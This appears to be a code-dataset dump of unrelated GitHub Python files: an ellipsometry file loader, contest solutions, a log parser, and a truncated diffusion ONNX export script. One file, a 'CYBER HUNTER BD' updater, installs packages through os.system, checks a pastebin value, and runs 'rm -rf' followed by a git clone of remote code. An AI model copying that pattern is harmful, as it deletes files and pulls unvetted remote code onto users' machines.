\"\"\"\n Set the data for this object from the supplied data.\n\n Parameters\n ----------\n data_tuple : tuple\n 4 member tuple containing the (wav, aoi, psi, delta) data to\n specify the dataset.\n\n Notes\n -----\n Clears the mask for the dataset, it will need to be reapplied.\n\n \"\"\"\n self._wavelength = np.array(data_tuple[0], dtype=float)\n self._aoi = np.array(data_tuple[1], dtype=float)\n self._psi = np.array(data_tuple[2], dtype=float)\n self._delta = np.array(data_tuple[3], dtype=float)\n\n self.mask = np.ones_like(self._wavelength, dtype=bool)\n\n def save(self, f):\n \"\"\"\n Save the data to file. Saves the data as a 4 column ASCII file.\n\n Parameters\n ----------\n f : file-handle or string\n File to save the dataset to.\n\n \"\"\"\n header = \"wavelength\\tAOI\\tPsi\\tDelta\"\n np.savetxt(\n f,\n np.column_stack(\n (self._wavelength, self._aoi, self._psi, self._delta)\n ),\n delimiter=\"\\t\",\n header=header,\n )\n\n def load(self, f):\n \"\"\"\n Load a dataset from file.\n Must be a 4 column ASCII file with columns [wavelength, AOI, Psi, Delta].\n\n Parameters\n ----------\n f : file-handle or string\n File to load the dataset from.\n\n \"\"\"\n\n skip_lines = 0\n with possibly_open_file(f, \"r\") as text:\n for i in range(100): # check the first 100 lines\n try:\n float(text.readline().split(self.delimiter)[0])\n break\n except ValueError:\n skip_lines += 1\n\n self._wavelength, self._aoi, self._psi, self._delta = np.loadtxt(\n f, skiprows=skip_lines, delimiter=self.delimiter, encoding=\"utf8\"\n ).T\n\n def refresh(self):\n \"\"\"\n Refreshes a previously loaded dataset.\n\n \"\"\"\n if self.filename is not None:\n with open(self.filename) as f:\n self.load(f)\n\n\ndef open_EP4file(fname, reflect_delta=False):\n \"\"\"\n Open and load in an Accurion EP4 formmated data file.\n Typically a .dat file.\n\n Note: This file parser has been written for specific Accurion ellipsometers\n EP3 and EP4. No work has been done to ensure it is compatible with all\n Accurion ellipsometers. 
If you have trouble with this parser contact the\n maintainers through github.\n\n Parameters\n ----------\n fname : file-handle or string\n File to load the dataset from.\n\n reflect_delta : bool\n Option to reflect delta around 180 degrees (as WVASE would).\n\n Returns\n ----------\n datasets : DataSE structure\n Structure containing wavelength, angle of incidence, psi and delta.\n\n\n \"\"\"\n df = pd.read_csv(fname, sep=\"\\t\", skiprows=[1])\n df = df.dropna(axis=0, how=\"any\")\n # normally the NaN are at the end of the file, but they can also be in\n # the middle\n df = df.reset_index()\n\n try:\n df[\"Time\"]\n time_data = True\n except KeyError:\n time_data = False\n print(\"No time data.\")\n\n if time_data and len(df[\"Time\"].drop_duplicates()) > 1:\n print(\"Treating as time series:\")\n output = []\n for t in df[\"Time\"].drop_duplicates():\n tdf = df[df[\"Time\"] == t]\n output += _loadEP4(tdf) # not sure if this will work\n output[-1][\"time\"] = t\n else:\n output = _loadEP4(df)\n for op in output:\n op[\"time\"] = None\n\n datasets = []\n for op in output:\n data = [op[\"lambda\"], op[\"aoi\"], op[\"psi\"], op[\"delta\"]]\n del op[\"lambda\"]\n del op[\"aoi\"]\n del op[\"psi\"]\n del op[\"delta\"]\n name = _make_EP4dname(fname, op)\n datasets.append(\n DataSE(data, name=name, reflect_delta=reflect_delta, **op)\n )\n\n if len(datasets) == 1:\n return datasets[0]\n else:\n return datasets\n\n\ndef _make_EP4dname(name, metadata):\n \"\"\"\n Create a helpful name for a data set based on an Accurion EP4\n formatted data file.\n\n Parameters\n ----------\n name : file-handle or string\n File name of data set.\n\n metadata : dict\n Dict containinng 'X pos', 'Y pos' and 'time' data.\n\n Returns\n ----------\n base : string\n Helpful name for the data set.\n\n \"\"\"\n name = str(name)\n base = name[: -len(\"_20200929-083122.ds.dat\")]\n if metadata[\"X pos\"] is not None:\n base += f\"_x={metadata['X pos']}mm_y={metadata['Y pos']}mm\"\n if metadata[\"time\"] is not None:\n base += f\"_t={metadata['time']}s\"\n return base\n\n\ndef custom_round(x, base=0.25):\n \"\"\"\n Perform rounding to a particular base. 
Default base is 0.25.\n\n Parameters\n ----------\n x : DataFrame, array or list\n Data to be rounded.\n\n base : float\n Base that the rounding will be with respect to.\n\n Returns\n ----------\n Result of cutsom round : np.array\n\n \"\"\"\n x = np.array(x, dtype=float)\n return np.round((base * np.round(x / base)), 2)\n\n\ndef _loadEP4(df):\n \"\"\"\n Specifically loading a data file created by an Accurion EP4 ellipsometer.\n Dataframe should have colums ['#Lambda','AOI','Psi','Delta'].\n Optionally can also have columns [X_pos, Y_pos].\n\n\n Parameters\n ----------\n df : DataFrame\n Data frame containing the wavelength, angle of incidence, psi and\n delta data.\n\n Returns\n ----------\n output : list of dicts\n Dicts containing wavelength, angle of indcidence, psi, delta and\n possible X pos and Y pos.\n\n \"\"\"\n\n try:\n df[\"X_pos\"]\n df[\"Y_pos\"]\n loc_data = True\n except KeyError:\n loc_data = False\n\n if loc_data and (\n len(df[\"X_pos\"].drop_duplicates()) > 1\n or len(df[\"Y_pos\"].drop_duplicates()) > 1\n ):\n xpos = np.nan\n ypos = np.nan\n\n area_indices = []\n for entry in df.iterrows():\n if (not np.allclose(xpos, entry[1][\"X_pos\"], atol=0.2)) or (\n not np.allclose(ypos, entry[1][\"Y_pos\"], atol=0.2)\n ):\n idx = entry[0]\n xpos = entry[1][\"X_pos\"]\n ypos = entry[1][\"Y_pos\"]\n area_indices.append(idx)\n area_indices.append(len(df))\n\n if len(area_indices) > 2:\n print(\"Treating as multiple locations\")\n else:\n print(\"Treating as single location\")\n\n output = []\n for i in range(len(area_indices) - 1):\n pdf = df.loc[area_indices[i] : area_indices[i + 1] - 1][\n [\"#Lambda\", \"AOI\", \"Psi\", \"Delta\", \"X_pos\", \"Y_pos\"]\n ]\n\n if len(pdf.index) > 0:\n ave_pos = pdf.groupby([\"AOI\", \"#Lambda\"]).mean()\n ave_pos = ave_pos.reset_index()\n\n summary = {\n \"lambda\": np.array(ave_pos[\"#Lambda\"]),\n \"aoi\": np.array(ave_pos[\"AOI\"]),\n \"psi\": np.array(ave_pos[\"Psi\"]),\n \"delta\": np.array(ave_pos[\"Delta\"]),\n \"X pos\": np.round(np.mean(ave_pos[\"X_pos\"]), 2),\n \"Y pos\": np.round(np.mean(ave_pos[\"Y_pos\"]), 2),\n }\n output.append(summary)\n else:\n print(\"Treating as single location\")\n df = df[[\"#Lambda\", \"AOI\", \"Psi\", \"Delta\"]]\n ave_pos = df.groupby([\"AOI\", \"#Lambda\"]).mean()\n ave_pos = ave_pos.reset_index()\n\n summary = {\n \"lambda\": np.array(ave_pos[\"#Lambda\"]),\n \"aoi\": np.array(ave_pos[\"AOI\"]),\n \"psi\": np.array(ave_pos[\"Psi\"]),\n \"delta\": np.array(ave_pos[\"Delta\"]),\n \"X pos\": None,\n \"Y pos\": None,\n }\n output = [summary]\n\n return output\n\n\ndef open_HORIBAfile(\n fname, reflect_delta=False, lambda_cutoffs=[-np.inf, np.inf]\n):\n \"\"\"\n Opening and loading in a data file created by a Horiba ellipsometer. Data\n file loaded should be of the Horiba file format .spe.\n\n Note: This file parser has been written for a specific ellipsometer, no\n work has been done to ensure it is compatable with all Horiba\n ellipsometers. 
If you have trouble with this parser contact the maintainers\n through github.\n\n Parameters\n ----------\n fname : file-handle or string\n File to load the dataset from.\n\n reflect_delta : bool\n Option to reflect delta around 180 degrees (as WVASE would).\n\n lambda_cutoffs : list\n Specifies the minimum and maximum wavelengths of data to be loaded.\n List has length 2.\n\n Returns\n ----------\n DataSE : DataSE structure\n The data file structure from the loaded Horiba file.\n\n \"\"\"\n\n name = fname[:-4]\n metadata = {}\n linenodict = {}\n MDingest = False\n\n with open(fname, \"r\") as f:\n lines = f.readlines()\n\n for i, line in enumerate(lines):\n line = line.strip() # Drop newline character\n if not MDingest:\n if len(line) and line[0] == \"#\":\n MDlabel = \" \".join(line.split(\" \")[1:])[:-1]\n metadata[MDlabel] = []\n linenodict[MDlabel] = i\n MDingest = True\n\n else:\n if not len(line):\n MDingest = False\n if not len(\n metadata[MDlabel]\n ): # there is no metadata for entry\n metadata[MDlabel] = None # Set metadata to none\n elif len(metadata[MDlabel]) == 1: # there is only one entry\n metadata[MDlabel] = metadata[MDlabel][\n 0\n ] # remove data from list\n\n else: # there is metadata in the line\n metadata[MDlabel].append(\n line\n ) # append line to metadata entry\n\n data_df = pd.read_csv(\n fname,\n skiprows=linenodict[\"DATA\"] + 1,\n nrows=len(metadata[\"DATA\"]) - 1,\n encoding=\"ANSI\",\n delimiter=\" \",\n usecols=[\"nm\", \"Psi\", \"Delta\"],\n )\n\n AOI = float(metadata[\"INCIDENCE ANGLE\"][:5])\n data_df[\"AOI\"] = AOI * np.ones_like(data_df[\"nm\"])\n data_df = data_df[data_df[\"nm\"] > lambda_cutoffs[0]]\n data_df = data_df[data_df[\"nm\"] < lambda_cutoffs[1]]\n\n data = [data_df[\"nm\"], data_df[\"AOI\"], data_df[\"Psi\"], data_df[\"Delta\"]]\n\n return DataSE(data, name=name, reflect_delta=reflect_delta, **metadata)\n","repo_name":"refnx/refellips","sub_path":"refellips/dataSE.py","file_name":"dataSE.py","file_ext":"py","file_size_in_byte":16035,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"16"}
+{"seq_id":"38786469785","text":"s = list(input())\n\nmax = 0\nfor i in range(len(s)):\n for j in reversed(range(len(s) + 1)):\n cnt = 0\n for k in range(i, j):\n if s[k] == \"A\" or s[k] == \"C\" or s[k] == \"G\" or s[k] == \"T\":\n cnt += 1\n else:\n cnt = 0\n break\n if max < cnt:\n max = cnt\nprint(max)\n","repo_name":"RuRey0310/Competitive_Programming","sub_path":"ABC100~150/ABC122/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"13322755031","text":"import getpass,time,os,sys\nimport os \nab=\"1\"\nimport signal\nimport time,os,sys\nimport sys, random\nimport threading,time\nimport os,requests\nos.system(\"pip install mechanize \")\nblue= '\\33[94m'\nlightblue = '\\033[94m'\nred = '\\033[91m'\nwhite = '\\33[97m'\nyellow = '\\33[93m'\ngreen = '\\033[1;32m'\ncyan = \"\\033[96m\"\nend = '\\033[0m'\nblack=\"\\033[0;30m\"\nblue= '\\33[94m'\nlightblue = '\\033[94m'\nred = '\\033[91m'\nwhite = '\\33[97m'\nyellow = '\\33[93m'\ngreen = '\\033[1;32m'\ncyan = \"\\033[96m\"\nend = '\\033[0m'\nblack=\"\\033[0;30m\"\npink=\"\\x1b[95m\"\nblue=\"\\x1b[94m\"\nunderline='\\x1b[4m'\ncolouroff=\"\\x1b[00m\"\nimport os,sys,time,random\nprint(\"\")\nprint(\"\")\ncolor = [\"\\033[1;31m\",\"\\033[1;32m\", \"\\033[96m\", '\\33[93m' '\\33[94m']\nm = random.choice(color)+\"Update CK \"\nfor msg in m:\n sys.stdout.write(msg)\n sys.stdout.flush()\n time.sleep(0.09)\nprint(\"\")\n\nlogu=(pink+f\"\"\"\n\\t ____ _ _ ____\n\\t / ___| | | | | | __ )\n\\t| | | |_| | | _ \\ \"\"\"+colouroff+underline+\"\"\"CYBER HUNTER BD\"\"\"+colouroff+pink+\"\"\"\n\\t| |___ | _ | | |_) |\n\\t \\____| |_| |_| |____/ \n\\n\"\"\"+blue+\"\"\" Focous on Your Aim, You Will winner\"\"\")\n\n\nline=end+\"\\n__________________________________________________________\"\ndef a():\n\tprint(logu+\"\\n\\n\t\"+green+\" Developed By : MD ALAMIN CHOWDORY\"+green+\"\\n\\n \t\"+red+\" \\n\\n \"+line)\na()\n\nr=requests.get(\"https://pastebin.com/zHRgbXCi\").text\n\nr2=str(r)\n\nif ab==r2:\n pass\n os.system(\"python main.py\")\n \nelse:\n print(\"update This Tool \")\n \n os.system(\"cd $home && rm -rf chb && git clone https://github.com/CyberHanterBangladesh/chb \")\n \n","repo_name":"HIDDEN-VIRUS/chb","sub_path":"u.py","file_name":"u.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"}
+{"seq_id":"69828021449","text":"# -*- coding=utf-8 -*-\r\n# author: zhihua.ye@spreadtrum.com\r\n\r\nimport sys\r\nimport os\r\n#sys.path.append('./')\r\n#print sys.path\r\nimport definition\r\nfrom config import *\r\nfrom lib.logConf import logConf\r\nfrom lib.logutils import logutils\r\nfrom helper.processmap import *\r\nfrom helper.excelhelper import *\r\nimport re\r\nfrom easygui import *\r\n\r\n#TODO list:\r\n#1. find pid by words\r\n#1.1 pid may change, process restart\r\n#2. unittest\r\n#3. decode flow\r\n#3.1 idea is different from old style:\r\n# media only need the process, simple is beautiful.\r\n# record start\r\n\r\n# record end\r\n# for phrase one:\r\n# 1. log grep\r\n# 2. data statistics\r\n# TODO: 3. vowifi video start/stop\r\n# FIXED: 4. call info\r\n# FIXED: record statistics, pps, sps,rtp\r\n# TODO: add simple UI.\r\n\r\nclass mflow:\r\n def __init__(self, logname='', outdir='./', loglevel='DEBUG'):\r\n self.log = os.path.realpath(logname)\r\n with open(self.log, 'rb') as logfile:\r\n self.loglines = logfile.readlines()\r\n self.logger = logConf(debuglevel=loglevel)\r\n self.logger.logger.info('init flow')\r\n self.config = config()\r\n self.logutils = logutils()\r\n\r\n logbasename = os.path.basename(logname)\r\n # get prefix, get timestamp\r\n prefix = logbasename.split('.')[0]\r\n self.version = self.config.getversion()\r\n #output is in one extra dir\r\n self.outdir = os.path.dirname(logname) + '/output'\r\n self.logutils.mkdirp(self.outdir)\r\n\r\n self.trimlog = self.outdir + '/' + prefix + '_' +self.logger.timestamp +'_media.log'\r\n with open(self.trimlog, 'a+')as trimlog:\r\n trimlog.truncate()\r\n\r\n self.excel = self.outdir + '/' + prefix + '_' +self.logger.timestamp +'_statictics.xlsx'\r\n\r\n #final eventmsg should be processed\r\n self.eventmsgs = list()\r\n\r\n #pid should be a verbose list\r\n self.pids = list()\r\n\r\n #call list\r\n self.calllist = list()\r\n\r\n #call number\r\n self.callnum = 0\r\n\r\n #Do we really need this F*cking global flag\r\n self.incall = False\r\n self.curcall = None\r\n\r\n def findPid(self):\r\n '''\r\n description: process may restart, so pid is a list\r\n :return:\r\n '''\r\n for index, line in enumerate(self.loglines):\r\n fields = line.split()\r\n fruit = self.logutils.findfields(fields)\r\n pid = fruit['pid']\r\n #start to find pid\r\n for index, process in enumerate(ProcessList):\r\n key = process.getkey()\r\n name = process.getname()\r\n plist = process.getpidlist()\r\n if pid not in self.pids and self.logutils.patterninline(key, line):\r\n self.logger.logger.info('found id ' + str(pid) + ' for ' + name)\r\n self.pids.append(pid)\r\n plist.append(pid)\r\n\r\n\r\n def parse(self):\r\n '''\r\n 1. pass pid lines\r\n 2. pattern match\r\n 3. pattern handler\r\n 4. 
draw the graph, csv,\r\n :return:\r\n '''\r\n #find all pids\r\n self.findPid()\r\n\r\n #handle each patten by pid\r\n for index, line in enumerate(self.loglines):\r\n fields = line.split()\r\n fruit = self.logutils.findfields(fields)\r\n pid = fruit['pid']\r\n for index, process in enumerate(ProcessList):\r\n plist = process.getpidlist()\r\n pevent = process.getpevent()\r\n if pid in plist:\r\n #then we handle the event\r\n elist = pevent.geteventlist()\r\n for eindex, event in enumerate(elist):\r\n key = event['key']\r\n groupnum = event['groupnum']\r\n color = event['color']\r\n eventHandler = event['eventHandler']\r\n\r\n regex = re.compile(key)\r\n result = regex.search(line)\r\n if result:\r\n #redirect output\r\n with open(self.trimlog, 'a+') as trimlog:\r\n trimlog.write(line)\r\n\r\n #start to handle event, pass the mflow instance\r\n handlerobj = eventHandler(result, color, groupnum, mflow=self, fruit=fruit)\r\n eventdict = handlerobj.getret()\r\n\r\n def dumpcalllist(self):\r\n self.logger.logger.info('Totally Call number is ' + str(self.callnum))\r\n for cindex, call in enumerate(self.calllist):\r\n call.dumpcall()\r\n\r\n def gensummarysheet(self,sheet):\r\n # gen header\r\n sheet.title = \"Summary\"\r\n #header = ['No.', 'Codec', 'CVO/id', 'fps', 'Resolution', 'start', 'end', 'duration', 'first sps', 'first pps']\r\n header = ['No.', 'Codec', 'CVO/id', 'start', 'end', 'duration', 'first sps', 'first pps']\r\n sheet.append(header)\r\n for cindex, call in enumerate(self.calllist):\r\n onerow = list()\r\n onerow.append(cindex+1)\r\n # add codec info\r\n onerow.append(call.codec['name'] +'/' + call.codec['payload'])\r\n onerow.append(call.codec['cvo'] + '/' + call.codec['cvoid'])\r\n #onerow.append(call.camerainfo['minfps'] + '->' + call.camerainfo['maxfps'])\r\n #onerow.append(call.camerainfo['width'] + 'x' + call.camerainfo['height'])\r\n\r\n onerow.append(call.time['start'])\r\n onerow.append(call.time['end'])\r\n onerow.append(call.time['duration'])\r\n onerow.append(call.time['firstpps'])\r\n onerow.append(call.time['firstsps'])\r\n sheet.append(onerow)\r\n adjuctcolumnsize(sheet)\r\n\r\n def exportexcel(self):\r\n # generate sheet named by VT_Call_number_sendstat/recvstat\r\n wb = Workbook()\r\n self.gensummarysheet(wb.active)\r\n\r\n # the first sheet is always sendstat of call 1\r\n for cindex, call in enumerate(self.calllist):\r\n #one call will have two sheets: send, recv\r\n realindex = cindex + 1\r\n self.logger.logger.info('start to handle call ' + str(realindex))\r\n\r\n firstws = wb.create_sheet(title=call.sendsheettitle(realindex))\r\n secondws = wb.create_sheet(title=call.recvsheettitle(realindex))\r\n\r\n call.gensendsheet(firstws)\r\n adjuctcolumnsize(firstws)\r\n\r\n call.genrecvsheet(secondws)\r\n adjuctcolumnsize(secondws)\r\n\r\n wb.save(self.excel)\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n #mflow = mflow(logname=\"./samplelog/main.log\")\r\n mflow = mflow(logname=\"./samplelog/751978/mo.log\")\r\n mflow.parse()\r\n mflow.dumpcalllist()\r\n mflow.exportexcel()\r\n pass\r\n","repo_name":"deevarvar/myLab","sub_path":"sprd/vowifi/mengine_parser/mflow_parser.py","file_name":"mflow_parser.py","file_ext":"py","file_size_in_byte":6822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"1840038200","text":"def plusOne(digits):\n if digits[0] == 9:\n digits.insert(0, 0)\n for i in range(len(digits)-1, -1, -1):\n if digits[i] != 9:\n digits[i] += 1\n break\n else:\n digits[i] = 0\n if digits[0] == 0:\n digits.remove(0)\n return digits\n\n\ndigits = [9, 9, 9]\nprint(plusOne(digits))\n\ndigits2 = [9,8,7,6,5,4,3,2,1,0]\nprint(plusOne(digits2))","repo_name":"morozooff/leetCode-solutions","sub_path":"easy/plusOne.py","file_name":"plusOne.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"11384117849","text":"import os\nimport sys\n\n\nroot_dir = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nos.environ['PYTHONPATH'] = f'\"{root_dir}\"'\nsys.path.insert(0, root_dir)\n\n\nimport argparse\nimport math\nimport re\nimport struct\nfrom functools import partial\n\nimport numpy as np\nimport onnx\nimport onnxsim\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as functional\nfrom torch.nn import Linear\n\nfrom modules.commons.common_layers import Mish\nfrom src.diff.net import AttrDict\nfrom utils import load_ckpt\nfrom utils.hparams import hparams, set_hparams\n\n\ndef extract(a, t):\n return a[t].reshape((1, 1, 1, 1))\n\n\ndef linear_beta_schedule(timesteps, max_beta=hparams.get('max_beta', 0.01)):\n \"\"\"\n linear schedule\n \"\"\"\n betas = np.linspace(1e-4, max_beta, timesteps)\n return betas\n\n\ndef cosine_beta_schedule(timesteps, s=0.008):\n \"\"\"\n cosine schedule\n as proposed in https://openreview.net/forum?id=-NEXDKk8gZ\n \"\"\"\n steps = timesteps + 1\n x = np.linspace(0, steps, steps)\n alphas_cumprod = np.cos(((x / steps) + s) / (1 + s) * np.pi * 0.5) ** 2\n alphas_cumprod = alphas_cumprod / alphas_cumprod[0]\n betas = 1 - (alphas_cumprod[1:] / alphas_cumprod[:-1])\n return np.clip(betas, a_min=0, a_max=0.999)\n\n\nbeta_schedule = {\n \"cosine\": cosine_beta_schedule,\n \"linear\": linear_beta_schedule,\n}\n\n\nclass SinusoidalPosEmb(nn.Module):\n def __init__(self, dim):\n super().__init__()\n self.dim = dim\n half_dim = dim // 2\n emb = math.log(10000) / (half_dim - 1)\n self.register_buffer('emb', torch.exp(torch.arange(half_dim) * torch.tensor(-emb)).unsqueeze(0))\n\n def forward(self, x):\n emb = self.emb * x\n emb = torch.cat((emb.sin(), emb.cos()), dim=-1)\n return emb\n\n\nclass KaimingNormalConv1d(nn.Conv1d):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n nn.init.kaiming_normal_(self.weight)\n\n\nclass ResidualBlock(nn.Module):\n def __init__(self, encoder_hidden, residual_channels, dilation):\n super().__init__()\n self.residual_channels = residual_channels\n self.dilated_conv = KaimingNormalConv1d(\n residual_channels,\n 2 * residual_channels,\n 3,\n padding=dilation,\n dilation=dilation)\n self.diffusion_projection = Linear(residual_channels, residual_channels)\n self.conditioner_projection = KaimingNormalConv1d(encoder_hidden, 2 * residual_channels, 1)\n self.output_projection = KaimingNormalConv1d(residual_channels, 2 * residual_channels, 1)\n\n def forward(self, x, conditioner, diffusion_step):\n diffusion_step = self.diffusion_projection(diffusion_step).unsqueeze(-1)\n conditioner = self.conditioner_projection(conditioner)\n y = x + diffusion_step\n\n y = self.dilated_conv(y) + conditioner\n\n # Using torch.split instead of torch.chunk to avoid using onnx::Slice\n gate, filter = torch.split(y, [self.residual_channels, self.residual_channels], dim=1)\n\n y = torch.sigmoid(gate) * torch.tanh(filter)\n y = self.output_projection(y)\n\n # Using torch.split instead of torch.chunk to avoid using onnx::Slice\n residual, skip = torch.split(y, [self.residual_channels, self.residual_channels], dim=1)\n\n return (x + residual) / math.sqrt(2.0), skip\n\n\nclass DiffNet(nn.Module):\n def __init__(self, in_dims=80):\n super().__init__()\n self.params = params = AttrDict(\n # Model params\n encoder_hidden=hparams['hidden_size'],\n residual_layers=hparams['residual_layers'],\n residual_channels=hparams['residual_channels'],\n 
dilation_cycle_length=hparams['dilation_cycle_length'],\n )\n self.input_projection = KaimingNormalConv1d(in_dims, params.residual_channels, 1)\n self.diffusion_embedding = SinusoidalPosEmb(params.residual_channels)\n dim = params.residual_channels\n self.mlp = nn.Sequential(\n nn.Linear(dim, dim * 4),\n Mish(),\n nn.Linear(dim * 4, dim)\n )\n self.residual_layers = nn.ModuleList([\n ResidualBlock(params.encoder_hidden, params.residual_channels, 2 ** (i % params.dilation_cycle_length))\n for i in range(params.residual_layers)\n ])\n self.skip_projection = KaimingNormalConv1d(params.residual_channels, params.residual_channels, 1)\n self.output_projection = KaimingNormalConv1d(params.residual_channels, in_dims, 1)\n nn.init.zeros_(self.output_projection.weight)\n\n # TODO: swap order of `diffusion_steps` and `cond`\n def forward(self, spec, diffusion_step, cond):\n \"\"\"\n\n :param spec: [B, 1, M, T]\n :param diffusion_step: [B, 1]\n :param cond: [B, M, T]\n :return:\n \"\"\"\n x = spec.squeeze(1)\n x = self.input_projection(x) # [B, residual_channel, T]\n\n x = functional.relu(x)\n diffusion_step = diffusion_step.float()\n diffusion_step = self.diffusion_embedding(diffusion_step)\n diffusion_step = self.mlp(diffusion_step)\n\n # Avoid ConstantOfShape op\n x, skip = self.residual_layers[0](x, cond, diffusion_step)\n # noinspection PyTypeChecker\n for layer in self.residual_layers[1:]:\n x, skip_connection = layer.forward(x, cond, diffusion_step)\n skip += skip_connection\n\n x = skip / math.sqrt(len(self.residual_layers))\n\n x = self.skip_projection(x)\n x = functional.relu(x)\n x = self.output_projection(x) # [B, mel_bins, T]\n return x.unsqueeze(1)\n\n\nclass NaiveNoisePredictor(nn.Module):\n def __init__(self):\n super().__init__()\n to_torch = partial(torch.tensor, dtype=torch.float32)\n\n self.register_buffer('clip_min', to_torch(-1.))\n self.register_buffer('clip_max', to_torch(1.))\n\n def forward(self, x, noise_pred, t):\n x_recon = (\n extract(self.sqrt_recip_alphas_cumprod, t) * x -\n extract(self.sqrt_recipm1_alphas_cumprod, t) * noise_pred\n )\n x_recon = torch.clamp(x_recon, min=self.clip_min, max=self.clip_max)\n\n model_mean = (\n extract(self.posterior_mean_coef1, t) * x_recon +\n extract(self.posterior_mean_coef2, t) * x\n )\n model_log_variance = extract(self.posterior_log_variance_clipped, t)\n noise = torch.randn_like(x)\n # no noise when t == 0\n nonzero_mask = ((t > 0).float()).reshape(1, 1, 1, 1)\n return model_mean + nonzero_mask * (0.5 * model_log_variance).exp() * noise\n\n\nclass PLMSNoisePredictor(nn.Module):\n def __init__(self):\n super().__init__()\n to_torch = partial(torch.tensor, dtype=torch.float32)\n\n # Below are buffers for TorchScript to pass jit compilation.\n self.register_buffer('_1', to_torch(1))\n self.register_buffer('_2', to_torch(2))\n self.register_buffer('_3', to_torch(3))\n self.register_buffer('_5', to_torch(5))\n self.register_buffer('_9', to_torch(9))\n self.register_buffer('_12', to_torch(12))\n self.register_buffer('_16', to_torch(16))\n self.register_buffer('_23', to_torch(23))\n self.register_buffer('_24', to_torch(24))\n self.register_buffer('_37', to_torch(37))\n self.register_buffer('_55', to_torch(55))\n self.register_buffer('_59', to_torch(59))\n\n def forward(self, x, noise_t, t, t_prev):\n a_t = extract(self.alphas_cumprod, t)\n a_prev = extract(self.alphas_cumprod, t_prev)\n a_t_sq, a_prev_sq = a_t.sqrt(), a_prev.sqrt()\n\n x_delta = (a_prev - a_t) * ((self._1 / (a_t_sq * (a_t_sq + a_prev_sq))) * x - self._1 / (\n a_t_sq * 
(((self._1 - a_prev) * a_t).sqrt() + ((self._1 - a_t) * a_prev).sqrt())) * noise_t)\n x_pred = x + x_delta\n\n return x_pred\n\n def predict_stage0(self, noise_pred, noise_pred_prev):\n return (noise_pred\n + noise_pred_prev) / self._2\n\n def predict_stage1(self, noise_pred, noise_list):\n return (noise_pred * self._3\n - noise_list[-1]) / self._2\n\n def predict_stage2(self, noise_pred, noise_list):\n return (noise_pred * self._23\n - noise_list[-1] * self._16\n + noise_list[-2] * self._5) / self._12\n\n def predict_stage3(self, noise_pred, noise_list):\n return (noise_pred * self._55\n - noise_list[-1] * self._59\n + noise_list[-2] * self._37\n - noise_list[-3] * self._9) / self._24\n\n\nclass MelExtractor(nn.Module):\n def __init__(self, spec_min, spec_max, keep_bins):\n super().__init__()\n\n def forward(self, x):\n x = x.squeeze(1).permute(0, 2, 1)\n d = (self.spec_max - self.spec_min) / 2\n m = (self.spec_max + self.spec_min) / 2\n return x * d + m\n\n\nclass GaussianDiffusion(nn.Module):\n def __init__(self, out_dims, timesteps=1000, k_step=1000, spec_min=None, spec_max=None):\n super().__init__()\n self.mel_bins = out_dims\n self.K_step = k_step\n\n self.denoise_fn = DiffNet(out_dims)\n self.naive_noise_predictor = NaiveNoisePredictor()\n self.plms_noise_predictor = PLMSNoisePredictor()\n self.mel_extractor = MelExtractor(spec_min=spec_min, spec_max=spec_max, keep_bins=hparams['keep_bins'])\n\n if 'schedule_type' in hparams.keys():\n betas = beta_schedule[hparams['schedule_type']](timesteps)\n else:\n betas = cosine_beta_schedule(timesteps)\n\n # Below are buffers for state_dict to load into.\n alphas = 1. - betas\n alphas_cumprod = np.cumprod(alphas, axis=0)\n alphas_cumprod_prev = np.append(1., alphas_cumprod[:-1])\n\n timesteps, = betas.shape\n self.num_timesteps = int(timesteps)\n\n to_torch = partial(torch.tensor, dtype=torch.float32)\n\n self.register_buffer('alphas_cumprod', to_torch(alphas_cumprod))\n\n # calculations for diffusion q(x_t | x_{t-1}) and others\n self.register_buffer('sqrt_recip_alphas_cumprod', to_torch(np.sqrt(1. / alphas_cumprod)))\n self.register_buffer('sqrt_recipm1_alphas_cumprod', to_torch(np.sqrt(1. / alphas_cumprod - 1)))\n\n # calculations for posterior q(x_{t-1} | x_t, x_0)\n posterior_variance = betas * (1. - alphas_cumprod_prev) / (1. - alphas_cumprod)\n # above: equal to 1. / (1. / (1. - alpha_cumprod_tm1) + alpha_t / beta_t)\n # below: log calculation clipped because the posterior variance is 0 at the beginning of the diffusion chain\n self.register_buffer('posterior_log_variance_clipped', to_torch(np.log(np.maximum(posterior_variance, 1e-20))))\n self.register_buffer('posterior_mean_coef1', to_torch(\n betas * np.sqrt(alphas_cumprod_prev) / (1. - alphas_cumprod)))\n self.register_buffer('posterior_mean_coef2', to_torch(\n (1. - alphas_cumprod_prev) * np.sqrt(alphas) / (1. 
- alphas_cumprod)))\n\n self.register_buffer('spec_min', torch.FloatTensor(spec_min)[None, None, :hparams['keep_bins']])\n self.register_buffer('spec_max', torch.FloatTensor(spec_max)[None, None, :hparams['keep_bins']])\n\n self.naive_noise_predictor = NaiveNoisePredictor()\n self.plms_noise_predictor = PLMSNoisePredictor()\n self.mel_extractor = MelExtractor(spec_min=spec_min, spec_max=spec_max, keep_bins=hparams['keep_bins'])\n\n def build_submodules(self):\n # Move registered buffers into submodules after loading state dict.\n self.naive_noise_predictor.register_buffer('sqrt_recip_alphas_cumprod', self.sqrt_recip_alphas_cumprod)\n self.naive_noise_predictor.register_buffer('sqrt_recipm1_alphas_cumprod', self.sqrt_recipm1_alphas_cumprod)\n self.naive_noise_predictor.register_buffer(\n 'posterior_log_variance_clipped', self.posterior_log_variance_clipped)\n self.naive_noise_predictor.register_buffer('posterior_mean_coef1', self.posterior_mean_coef1)\n self.naive_noise_predictor.register_buffer('posterior_mean_coef2', self.posterior_mean_coef2)\n self.plms_noise_predictor.register_buffer('alphas_cumprod', self.alphas_cumprod)\n self.mel_extractor.register_buffer('spec_min', self.spec_min)\n self.mel_extractor.register_buffer('spec_max', self.spec_max)\n del self.sqrt_recip_alphas_cumprod\n 